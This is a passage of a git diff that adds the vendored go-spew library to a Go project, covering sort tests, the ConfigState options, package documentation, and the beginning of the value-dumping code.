indirCir3 are used to generate an indirect circular +// reference for testing detection. +type indirCir1 struct { + ps2 *indirCir2 +} +type indirCir2 struct { + ps3 *indirCir3 +} +type indirCir3 struct { + ps1 *indirCir1 +} + +// embed is used to test embedded structures. +type embed struct { + a string +} + +// embedwrap is used to test embedded structures. 
+type embedwrap struct { + *embed + e *embed +} + +// panicer is used to intentionally cause a panic for testing spew properly +// handles them +type panicer int + +func (p panicer) String() string { + panic("test panic") +} + +// customError is used to test custom error interface invocation. +type customError int + +func (e customError) Error() string { + return fmt.Sprintf("error: %d", int(e)) +} + +// stringizeWants converts a slice of wanted test output into a format suitable +// for a test error message. +func stringizeWants(wants []string) string { + s := "" + for i, want := range wants { + if i > 0 { + s += fmt.Sprintf("want%d: %s", i+1, want) + } else { + s += "want: " + want + } + } + return s +} + +// testFailed returns whether or not a test failed by checking if the result +// of the test is in the slice of wanted strings. +func testFailed(result string, wants []string) bool { + for _, want := range wants { + if result == want { + return false + } + } + return true +} + +type sortableStruct struct { + x int +} + +func (ss sortableStruct) String() string { + return fmt.Sprintf("ss.%d", ss.x) +} + +type unsortableStruct struct { + x int +} + +type sortTestCase struct { + input []reflect.Value + expected []reflect.Value +} + +func helpTestSortValues(tests []sortTestCase, cs *spew.ConfigState, t *testing.T) { + getInterfaces := func(values []reflect.Value) []interface{} { + interfaces := []interface{}{} + for _, v := range values { + interfaces = append(interfaces, v.Interface()) + } + return interfaces + } + + for _, test := range tests { + spew.SortValues(test.input, cs) + // reflect.DeepEqual cannot really make sense of reflect.Value, + // probably because of all the pointer tricks. For instance, + // v(2.0) != v(2.0) on a 32-bits system. Turn them into interface{} + // instead. 
+ input := getInterfaces(test.input) + expected := getInterfaces(test.expected) + if !reflect.DeepEqual(input, expected) { + t.Errorf("Sort mismatch:\n %v != %v", input, expected) + } + } +} + +// TestSortValues ensures the sort functionality for relect.Value based sorting +// works as intended. +func TestSortValues(t *testing.T) { + v := reflect.ValueOf + + a := v("a") + b := v("b") + c := v("c") + embedA := v(embed{"a"}) + embedB := v(embed{"b"}) + embedC := v(embed{"c"}) + tests := []sortTestCase{ + // No values. + { + []reflect.Value{}, + []reflect.Value{}, + }, + // Bools. + { + []reflect.Value{v(false), v(true), v(false)}, + []reflect.Value{v(false), v(false), v(true)}, + }, + // Ints. + { + []reflect.Value{v(2), v(1), v(3)}, + []reflect.Value{v(1), v(2), v(3)}, + }, + // Uints. + { + []reflect.Value{v(uint8(2)), v(uint8(1)), v(uint8(3))}, + []reflect.Value{v(uint8(1)), v(uint8(2)), v(uint8(3))}, + }, + // Floats. + { + []reflect.Value{v(2.0), v(1.0), v(3.0)}, + []reflect.Value{v(1.0), v(2.0), v(3.0)}, + }, + // Strings. + { + []reflect.Value{b, a, c}, + []reflect.Value{a, b, c}, + }, + // Array + { + []reflect.Value{v([3]int{3, 2, 1}), v([3]int{1, 3, 2}), v([3]int{1, 2, 3})}, + []reflect.Value{v([3]int{1, 2, 3}), v([3]int{1, 3, 2}), v([3]int{3, 2, 1})}, + }, + // Uintptrs. + { + []reflect.Value{v(uintptr(2)), v(uintptr(1)), v(uintptr(3))}, + []reflect.Value{v(uintptr(1)), v(uintptr(2)), v(uintptr(3))}, + }, + // SortableStructs. + { + // Note: not sorted - DisableMethods is set. + []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})}, + []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})}, + }, + // UnsortableStructs. + { + // Note: not sorted - SpewKeys is false. + []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})}, + []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})}, + }, + // Invalid. 
+ { + []reflect.Value{embedB, embedA, embedC}, + []reflect.Value{embedB, embedA, embedC}, + }, + } + cs := spew.ConfigState{DisableMethods: true, SpewKeys: false} + helpTestSortValues(tests, &cs, t) +} + +// TestSortValuesWithMethods ensures the sort functionality for relect.Value +// based sorting works as intended when using string methods. +func TestSortValuesWithMethods(t *testing.T) { + v := reflect.ValueOf + + a := v("a") + b := v("b") + c := v("c") + tests := []sortTestCase{ + // Ints. + { + []reflect.Value{v(2), v(1), v(3)}, + []reflect.Value{v(1), v(2), v(3)}, + }, + // Strings. + { + []reflect.Value{b, a, c}, + []reflect.Value{a, b, c}, + }, + // SortableStructs. + { + []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})}, + []reflect.Value{v(sortableStruct{1}), v(sortableStruct{2}), v(sortableStruct{3})}, + }, + // UnsortableStructs. + { + // Note: not sorted - SpewKeys is false. + []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})}, + []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})}, + }, + } + cs := spew.ConfigState{DisableMethods: false, SpewKeys: false} + helpTestSortValues(tests, &cs, t) +} + +// TestSortValuesWithSpew ensures the sort functionality for relect.Value +// based sorting works as intended when using spew to stringify keys. +func TestSortValuesWithSpew(t *testing.T) { + v := reflect.ValueOf + + a := v("a") + b := v("b") + c := v("c") + tests := []sortTestCase{ + // Ints. + { + []reflect.Value{v(2), v(1), v(3)}, + []reflect.Value{v(1), v(2), v(3)}, + }, + // Strings. + { + []reflect.Value{b, a, c}, + []reflect.Value{a, b, c}, + }, + // SortableStructs. + { + []reflect.Value{v(sortableStruct{2}), v(sortableStruct{1}), v(sortableStruct{3})}, + []reflect.Value{v(sortableStruct{1}), v(sortableStruct{2}), v(sortableStruct{3})}, + }, + // UnsortableStructs. 
+ { + []reflect.Value{v(unsortableStruct{2}), v(unsortableStruct{1}), v(unsortableStruct{3})}, + []reflect.Value{v(unsortableStruct{1}), v(unsortableStruct{2}), v(unsortableStruct{3})}, + }, + } + cs := spew.ConfigState{DisableMethods: true, SpewKeys: true} + helpTestSortValues(tests, &cs, t) +} diff --git a/vendor/github.com/davecgh/go-spew/spew/config.go b/vendor/github.com/davecgh/go-spew/spew/config.go new file mode 100644 index 0000000000..2e3d22f312 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/config.go @@ -0,0 +1,306 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew + +import ( + "bytes" + "fmt" + "io" + "os" +) + +// ConfigState houses the configuration options used by spew to format and +// display values. There is a global instance, Config, that is used to control +// all top-level Formatter and Dump functionality. Each ConfigState instance +// provides methods equivalent to the top-level functions. +// +// The zero value for ConfigState provides no indentation. You would typically +// want to set it to a space or a tab. +// +// Alternatively, you can use NewDefaultConfig to get a ConfigState instance +// with default settings. See the documentation of NewDefaultConfig for default +// values. 
+type ConfigState struct { + // Indent specifies the string to use for each indentation level. The + // global config instance that all top-level functions use set this to a + // single space by default. If you would like more indentation, you might + // set this to a tab with "\t" or perhaps two spaces with " ". + Indent string + + // MaxDepth controls the maximum number of levels to descend into nested + // data structures. The default, 0, means there is no limit. + // + // NOTE: Circular data structures are properly detected, so it is not + // necessary to set this value unless you specifically want to limit deeply + // nested data structures. + MaxDepth int + + // DisableMethods specifies whether or not error and Stringer interfaces are + // invoked for types that implement them. + DisableMethods bool + + // DisablePointerMethods specifies whether or not to check for and invoke + // error and Stringer interfaces on types which only accept a pointer + // receiver when the current type is not a pointer. + // + // NOTE: This might be an unsafe action since calling one of these methods + // with a pointer receiver could technically mutate the value, however, + // in practice, types which choose to satisify an error or Stringer + // interface with a pointer receiver should not be mutating their state + // inside these interface methods. As a result, this option relies on + // access to the unsafe package, so it will not have any effect when + // running in environments without access to the unsafe package such as + // Google App Engine or with the "safe" build tag specified. + DisablePointerMethods bool + + // DisablePointerAddresses specifies whether to disable the printing of + // pointer addresses. This is useful when diffing data structures in tests. + DisablePointerAddresses bool + + // DisableCapacities specifies whether to disable the printing of capacities + // for arrays, slices, maps and channels. This is useful when diffing + // data structures in tests. 
+ DisableCapacities bool + + // ContinueOnMethod specifies whether or not recursion should continue once + // a custom error or Stringer interface is invoked. The default, false, + // means it will print the results of invoking the custom error or Stringer + // interface and return immediately instead of continuing to recurse into + // the internals of the data type. + // + // NOTE: This flag does not have any effect if method invocation is disabled + // via the DisableMethods or DisablePointerMethods options. + ContinueOnMethod bool + + // SortKeys specifies map keys should be sorted before being printed. Use + // this to have a more deterministic, diffable output. Note that only + // native types (bool, int, uint, floats, uintptr and string) and types + // that support the error or Stringer interfaces (if methods are + // enabled) are supported, with other types sorted according to the + // reflect.Value.String() output which guarantees display stability. + SortKeys bool + + // SpewKeys specifies that, as a last resort attempt, map keys should + // be spewed to strings and sorted by those strings. This is only + // considered if SortKeys is true. + SpewKeys bool +} + +// Config is the active configuration of the top-level functions. +// The configuration can be changed by modifying the contents of spew.Config. +var Config = ConfigState{Indent: " "} + +// Errorf is a wrapper for fmt.Errorf that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the formatted string as a value that satisfies error. See NewFormatter +// for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Errorf(format, c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Errorf(format string, a ...interface{}) (err error) { + return fmt.Errorf(format, c.convertArgs(a)...) 
+} + +// Fprint is a wrapper for fmt.Fprint that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Fprint(w, c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Fprint(w io.Writer, a ...interface{}) (n int, err error) { + return fmt.Fprint(w, c.convertArgs(a)...) +} + +// Fprintf is a wrapper for fmt.Fprintf that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Fprintf(w, format, c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Fprintf(w io.Writer, format string, a ...interface{}) (n int, err error) { + return fmt.Fprintf(w, format, c.convertArgs(a)...) +} + +// Fprintln is a wrapper for fmt.Fprintln that treats each argument as if it +// passed with a Formatter interface returned by c.NewFormatter. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Fprintln(w, c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Fprintln(w io.Writer, a ...interface{}) (n int, err error) { + return fmt.Fprintln(w, c.convertArgs(a)...) +} + +// Print is a wrapper for fmt.Print that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. 
+// +// This function is shorthand for the following syntax: +// +// fmt.Print(c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Print(a ...interface{}) (n int, err error) { + return fmt.Print(c.convertArgs(a)...) +} + +// Printf is a wrapper for fmt.Printf that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Printf(format, c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Printf(format string, a ...interface{}) (n int, err error) { + return fmt.Printf(format, c.convertArgs(a)...) +} + +// Println is a wrapper for fmt.Println that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the number of bytes written and any write error encountered. See +// NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Println(c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Println(a ...interface{}) (n int, err error) { + return fmt.Println(c.convertArgs(a)...) +} + +// Sprint is a wrapper for fmt.Sprint that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the resulting string. See NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Sprint(c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Sprint(a ...interface{}) string { + return fmt.Sprint(c.convertArgs(a)...) +} + +// Sprintf is a wrapper for fmt.Sprintf that treats each argument as if it were +// passed with a Formatter interface returned by c.NewFormatter. It returns +// the resulting string. See NewFormatter for formatting details. 
+// +// This function is shorthand for the following syntax: +// +// fmt.Sprintf(format, c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Sprintf(format string, a ...interface{}) string { + return fmt.Sprintf(format, c.convertArgs(a)...) +} + +// Sprintln is a wrapper for fmt.Sprintln that treats each argument as if it +// were passed with a Formatter interface returned by c.NewFormatter. It +// returns the resulting string. See NewFormatter for formatting details. +// +// This function is shorthand for the following syntax: +// +// fmt.Sprintln(c.NewFormatter(a), c.NewFormatter(b)) +func (c *ConfigState) Sprintln(a ...interface{}) string { + return fmt.Sprintln(c.convertArgs(a)...) +} + +/* +NewFormatter returns a custom formatter that satisfies the fmt.Formatter +interface. As a result, it integrates cleanly with standard fmt package +printing functions. The formatter is useful for inline printing of smaller data +types similar to the standard %v format specifier. + +The custom formatter only responds to the %v (most compact), %+v (adds pointer +addresses), %#v (adds types), and %#+v (adds types and pointer addresses) verb +combinations. Any other verbs such as %x and %q will be sent to the the +standard fmt package for formatting. In addition, the custom formatter ignores +the width and precision arguments (however they will still work on the format +specifiers not handled by the custom formatter). + +Typically this function shouldn't be called directly. It is much easier to make +use of the custom formatter by calling one of the convenience functions such as +c.Printf, c.Println, or c.Printf. +*/ +func (c *ConfigState) NewFormatter(v interface{}) fmt.Formatter { + return newFormatter(c, v) +} + +// Fdump formats and displays the passed arguments to io.Writer w. It formats +// exactly the same as Dump. +func (c *ConfigState) Fdump(w io.Writer, a ...interface{}) { + fdump(c, w, a...) 
+} + +/* +Dump displays the passed parameters to standard out with newlines, customizable +indentation, and additional debug information such as complete types and all +pointer addresses used to indirect to the final value. It provides the +following features over the built-in printing facilities provided by the fmt +package: + + * Pointers are dereferenced and followed + * Circular data structures are detected and handled properly + * Custom Stringer/error interfaces are optionally invoked, including + on unexported types + * Custom types which only implement the Stringer/error interfaces via + a pointer receiver are optionally invoked when passing non-pointer + variables + * Byte arrays and slices are dumped like the hexdump -C command which + includes offsets, byte values in hex, and ASCII output + +The configuration options are controlled by modifying the public members +of c. See ConfigState for options documentation. + +See Fdump if you would prefer dumping to an arbitrary io.Writer or Sdump to +get the formatted result as a string. +*/ +func (c *ConfigState) Dump(a ...interface{}) { + fdump(c, os.Stdout, a...) +} + +// Sdump returns a string with the passed arguments formatted exactly the same +// as Dump. +func (c *ConfigState) Sdump(a ...interface{}) string { + var buf bytes.Buffer + fdump(c, &buf, a...) + return buf.String() +} + +// convertArgs accepts a slice of arguments and returns a slice of the same +// length with each argument converted to a spew Formatter interface using +// the ConfigState associated with s. +func (c *ConfigState) convertArgs(args []interface{}) (formatters []interface{}) { + formatters = make([]interface{}, len(args)) + for index, arg := range args { + formatters[index] = newFormatter(c, arg) + } + return formatters +} + +// NewDefaultConfig returns a ConfigState with the following default settings. 
+// +// Indent: " " +// MaxDepth: 0 +// DisableMethods: false +// DisablePointerMethods: false +// ContinueOnMethod: false +// SortKeys: false +func NewDefaultConfig() *ConfigState { + return &ConfigState{Indent: " "} +} diff --git a/vendor/github.com/davecgh/go-spew/spew/doc.go b/vendor/github.com/davecgh/go-spew/spew/doc.go new file mode 100644 index 0000000000..aacaac6f1e --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/doc.go @@ -0,0 +1,211 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +/* +Package spew implements a deep pretty printer for Go data structures to aid in +debugging. 
+ +A quick overview of the additional features spew provides over the built-in +printing facilities for Go data types are as follows: + + * Pointers are dereferenced and followed + * Circular data structures are detected and handled properly + * Custom Stringer/error interfaces are optionally invoked, including + on unexported types + * Custom types which only implement the Stringer/error interfaces via + a pointer receiver are optionally invoked when passing non-pointer + variables + * Byte arrays and slices are dumped like the hexdump -C command which + includes offsets, byte values in hex, and ASCII output (only when using + Dump style) + +There are two different approaches spew allows for dumping Go data structures: + + * Dump style which prints with newlines, customizable indentation, + and additional debug information such as types and all pointer addresses + used to indirect to the final value + * A custom Formatter interface that integrates cleanly with the standard fmt + package and replaces %v, %+v, %#v, and %#+v to provide inline printing + similar to the default %v while providing the additional functionality + outlined above and passing unsupported format verbs such as %x and %q + along to fmt + +Quick Start + +This section demonstrates how to quickly get started with spew. See the +sections below for further details on formatting and configuration options. + +To dump a variable with full newlines, indentation, type, and pointer +information use Dump, Fdump, or Sdump: + spew.Dump(myVar1, myVar2, ...) + spew.Fdump(someWriter, myVar1, myVar2, ...) + str := spew.Sdump(myVar1, myVar2, ...) 
+ +Alternatively, if you would prefer to use format strings with a compacted inline +printing style, use the convenience wrappers Printf, Fprintf, etc with +%v (most compact), %+v (adds pointer addresses), %#v (adds types), or +%#+v (adds types and pointer addresses): + spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2) + spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4) + spew.Fprintf(someWriter, "myVar1: %v -- myVar2: %+v", myVar1, myVar2) + spew.Fprintf(someWriter, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4) + +Configuration Options + +Configuration of spew is handled by fields in the ConfigState type. For +convenience, all of the top-level functions use a global state available +via the spew.Config global. + +It is also possible to create a ConfigState instance that provides methods +equivalent to the top-level functions. This allows concurrent configuration +options. See the ConfigState documentation for more details. + +The following configuration options are available: + * Indent + String to use for each indentation level for Dump functions. + It is a single space by default. A popular alternative is "\t". + + * MaxDepth + Maximum number of levels to descend into nested data structures. + There is no limit by default. + + * DisableMethods + Disables invocation of error and Stringer interface methods. + Method invocation is enabled by default. + + * DisablePointerMethods + Disables invocation of error and Stringer interface methods on types + which only accept pointer receivers from non-pointer variables. + Pointer method invocation is enabled by default. + + * DisablePointerAddresses + DisablePointerAddresses specifies whether to disable the printing of + pointer addresses. This is useful when diffing data structures in tests. + + * DisableCapacities + DisableCapacities specifies whether to disable the printing of + capacities for arrays, slices, maps and channels. This is useful when + diffing data structures in tests. 
+ + * ContinueOnMethod + Enables recursion into types after invoking error and Stringer interface + methods. Recursion after method invocation is disabled by default. + + * SortKeys + Specifies map keys should be sorted before being printed. Use + this to have a more deterministic, diffable output. Note that + only native types (bool, int, uint, floats, uintptr and string) + and types which implement error or Stringer interfaces are + supported with other types sorted according to the + reflect.Value.String() output which guarantees display + stability. Natural map order is used by default. + + * SpewKeys + Specifies that, as a last resort attempt, map keys should be + spewed to strings and sorted by those strings. This is only + considered if SortKeys is true. + +Dump Usage + +Simply call spew.Dump with a list of variables you want to dump: + + spew.Dump(myVar1, myVar2, ...) + +You may also call spew.Fdump if you would prefer to output to an arbitrary +io.Writer. For example, to dump to standard error: + + spew.Fdump(os.Stderr, myVar1, myVar2, ...) + +A third option is to call spew.Sdump to get the formatted output as a string: + + str := spew.Sdump(myVar1, myVar2, ...) + +Sample Dump Output + +See the Dump example for details on the setup of the types and variables being +shown here. + + (main.Foo) { + unexportedField: (*main.Bar)(0xf84002e210)({ + flag: (main.Flag) flagTwo, + data: (uintptr) + }), + ExportedField: (map[interface {}]interface {}) (len=1) { + (string) (len=3) "one": (bool) true + } + } + +Byte (and uint8) arrays and slices are displayed uniquely like the hexdump -C +command as shown. + ([]uint8) (len=32 cap=32) { + 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 |............... 
| + 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 |!"#$%&'()*+,-./0| + 00000020 31 32 |12| + } + +Custom Formatter + +Spew provides a custom formatter that implements the fmt.Formatter interface +so that it integrates cleanly with standard fmt package printing functions. The +formatter is useful for inline printing of smaller data types similar to the +standard %v format specifier. + +The custom formatter only responds to the %v (most compact), %+v (adds pointer +addresses), %#v (adds types), or %#+v (adds types and pointer addresses) verb +combinations. Any other verbs such as %x and %q will be sent to the the +standard fmt package for formatting. In addition, the custom formatter ignores +the width and precision arguments (however they will still work on the format +specifiers not handled by the custom formatter). + +Custom Formatter Usage + +The simplest way to make use of the spew custom formatter is to call one of the +convenience functions such as spew.Printf, spew.Println, or spew.Printf. The +functions have syntax you are most likely already familiar with: + + spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2) + spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4) + spew.Println(myVar, myVar2) + spew.Fprintf(os.Stderr, "myVar1: %v -- myVar2: %+v", myVar1, myVar2) + spew.Fprintf(os.Stderr, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4) + +See the Index for the full list convenience functions. + +Sample Formatter Output + +Double pointer to a uint8: + %v: <**>5 + %+v: <**>(0xf8400420d0->0xf8400420c8)5 + %#v: (**uint8)5 + %#+v: (**uint8)(0xf8400420d0->0xf8400420c8)5 + +Pointer to circular struct with a uint8 field and a pointer to itself: + %v: <*>{1 <*>} + %+v: <*>(0xf84003e260){ui8:1 c:<*>(0xf84003e260)} + %#v: (*main.circular){ui8:(uint8)1 c:(*main.circular)} + %#+v: (*main.circular)(0xf84003e260){ui8:(uint8)1 c:(*main.circular)(0xf84003e260)} + +See the Printf example for details on the setup of variables being shown +here. 
+ +Errors + +Since it is possible for custom Stringer/error interfaces to panic, spew +detects them and handles them internally by printing the panic information +inline with the output. Since spew is intended to provide deep pretty printing +capabilities on structures, it intentionally does not return any errors. +*/ +package spew diff --git a/vendor/github.com/davecgh/go-spew/spew/dump.go b/vendor/github.com/davecgh/go-spew/spew/dump.go new file mode 100644 index 0000000000..df1d582a72 --- /dev/null +++ b/vendor/github.com/davecgh/go-spew/spew/dump.go @@ -0,0 +1,509 @@ +/* + * Copyright (c) 2013-2016 Dave Collins + * + * Permission to use, copy, modify, and distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +package spew + +import ( + "bytes" + "encoding/hex" + "fmt" + "io" + "os" + "reflect" + "regexp" + "strconv" + "strings" +) + +var ( + // uint8Type is a reflect.Type representing a uint8. It is used to + // convert cgo types to uint8 slices for hexdumping. + uint8Type = reflect.TypeOf(uint8(0)) + + // cCharRE is a regular expression that matches a cgo char. + // It is used to detect character arrays to hexdump them. + cCharRE = regexp.MustCompile("^.*\\._Ctype_char$") + + // cUnsignedCharRE is a regular expression that matches a cgo unsigned + // char. It is used to detect unsigned character arrays to hexdump + // them. 
+ cUnsignedCharRE = regexp.MustCompile("^.*\\._Ctype_unsignedchar$") + + // cUint8tCharRE is a regular expression that matches a cgo uint8_t. + // It is used to detect uint8_t arrays to hexdump them. + cUint8tCharRE = regexp.MustCompile("^.*\\._Ctype_uint8_t$") +) + +// dumpState contains information about the state of a dump operation. +type dumpState struct { + w io.Writer + depth int + pointers map[uintptr]int + ignoreNextType bool + ignoreNextIndent bool + cs *ConfigState +} + +// indent performs indentation according to the depth level and cs.Indent +// option. +func (d *dumpState) indent() { + if d.ignoreNextIndent { + d.ignoreNextIndent = false + return + } + d.w.Write(bytes.Repeat([]byte(d.cs.Indent), d.depth)) +} + +// unpackValue returns values inside of non-nil interfaces when possible. +// This is useful for data types like structs, arrays, slices, and maps which +// can contain varying types packed inside an interface. +func (d *dumpState) unpackValue(v reflect.Value) reflect.Value { + if v.Kind() == reflect.Interface && !v.IsNil() { + v = v.Elem() + } + return v +} + +// dumpPtr handles formatting of pointers by indirecting them as necessary. +func (d *dumpState) dumpPtr(v reflect.Value) { + // Remove pointers at or below the current depth from map used to detect + // circular refs. + for k, depth := range d.pointers { + if depth >= d.depth { + delete(d.pointers, k) + } + } + + // Keep list of all dereferenced pointers to show later. + pointerChain := make([]uintptr, 0) + + // Figure out how many levels of indirection there are by dereferencing + // pointers and unpacking interfaces down the chain while detecting circular + // references. 
+ nilFound := false + cycleFound := false + indirects := 0 + ve := v + for ve.Kind() == reflect.Ptr { + if ve.IsNil() { + nilFound = true + break + } + indirects++ + addr := ve.Pointer() + pointerChain = append(pointerChain, addr) + if pd, ok := d.pointers[addr]; ok && pd < d.depth { + cycleFound = true + indirects-- + break + } + d.pointers[addr] = d.depth + + ve = ve.Elem() + if ve.Kind() == reflect.Interface { + if ve.IsNil() { + nilFound = true + break + } + ve = ve.Elem() + } + } + + // Display type information. + d.w.Write(openParenBytes) + d.w.Write(bytes.Repeat(asteriskBytes, indirects)) + d.w.Write([]byte(ve.Type().String())) + d.w.Write(closeParenBytes) + + // Display pointer information. + if !d.cs.DisablePointerAddresses && len(pointerChain) > 0 { + d.w.Write(openParenBytes) + for i, addr := range pointerChain { + if i > 0 { + d.w.Write(pointerChainBytes) + } + printHexPtr(d.w, addr) + } + d.w.Write(closeParenBytes) + } + + // Display dereferenced value. + d.w.Write(openParenBytes) + switch { + case nilFound == true: + d.w.Write(nilAngleBytes) + + case cycleFound == true: + d.w.Write(circularBytes) + + default: + d.ignoreNextType = true + d.dump(ve) + } + d.w.Write(closeParenBytes) +} + +// dumpSlice handles formatting of arrays and slices. Byte (uint8 under +// reflection) arrays and slices are dumped in hexdump -C fashion. +func (d *dumpState) dumpSlice(v reflect.Value) { + // Determine whether this type should be hex dumped or not. Also, + // for types which should be hexdumped, try to use the underlying data + // first, then fall back to trying to convert them to a uint8 slice. + var buf []uint8 + doConvert := false + doHexDump := false + numEntries := v.Len() + if numEntries > 0 { + vt := v.Index(0).Type() + vts := vt.String() + switch { + // C types that need to be converted. 
+ case cCharRE.MatchString(vts): + fallthrough + case cUnsignedCharRE.MatchString(vts): + fallthrough + case cUint8tCharRE.MatchString(vts): + doConvert = true + + // Try to use existing uint8 slices and fall back to converting + // and copying if that fails. + case vt.Kind() == reflect.Uint8: + // We need an addressable interface to convert the type + // to a byte slice. However, the reflect package won't + // give us an interface on certain things like + // unexported struct fields in order to enforce + // visibility rules. We use unsafe, when available, to + // bypass these restrictions since this package does not + // mutate the values. + vs := v + if !vs.CanInterface() || !vs.CanAddr() { + vs = unsafeReflectValue(vs) + } + if !UnsafeDisabled { + vs = vs.Slice(0, numEntries) + + // Use the existing uint8 slice if it can be + // type asserted. + iface := vs.Interface() + if slice, ok := iface.([]uint8); ok { + buf = slice + doHexDump = true + break + } + } + + // The underlying data needs to be converted if it can't + // be type asserted to a uint8 slice. + doConvert = true + } + + // Copy and convert the underlying type if needed. + if doConvert && vt.ConvertibleTo(uint8Type) { + // Convert and copy each element into a uint8 byte + // slice. + buf = make([]uint8, numEntries) + for i := 0; i < numEntries; i++ { + vv := v.Index(i) + buf[i] = uint8(vv.Convert(uint8Type).Uint()) + } + doHexDump = true + } + } + + // Hexdump the entire slice as needed. + if doHexDump { + indent := strings.Repeat(d.cs.Indent, d.depth) + str := indent + hex.Dump(buf) + str = strings.Replace(str, "\n", "\n"+indent, -1) + str = strings.TrimRight(str, d.cs.Indent) + d.w.Write([]byte(str)) + return + } + + // Recursively call dump for each item. + for i := 0; i < numEntries; i++ { + d.dump(d.unpackValue(v.Index(i))) + if i < (numEntries - 1) { + d.w.Write(commaNewlineBytes) + } else { + d.w.Write(newlineBytes) + } + } +} + +// dump is the main workhorse for dumping a value. 
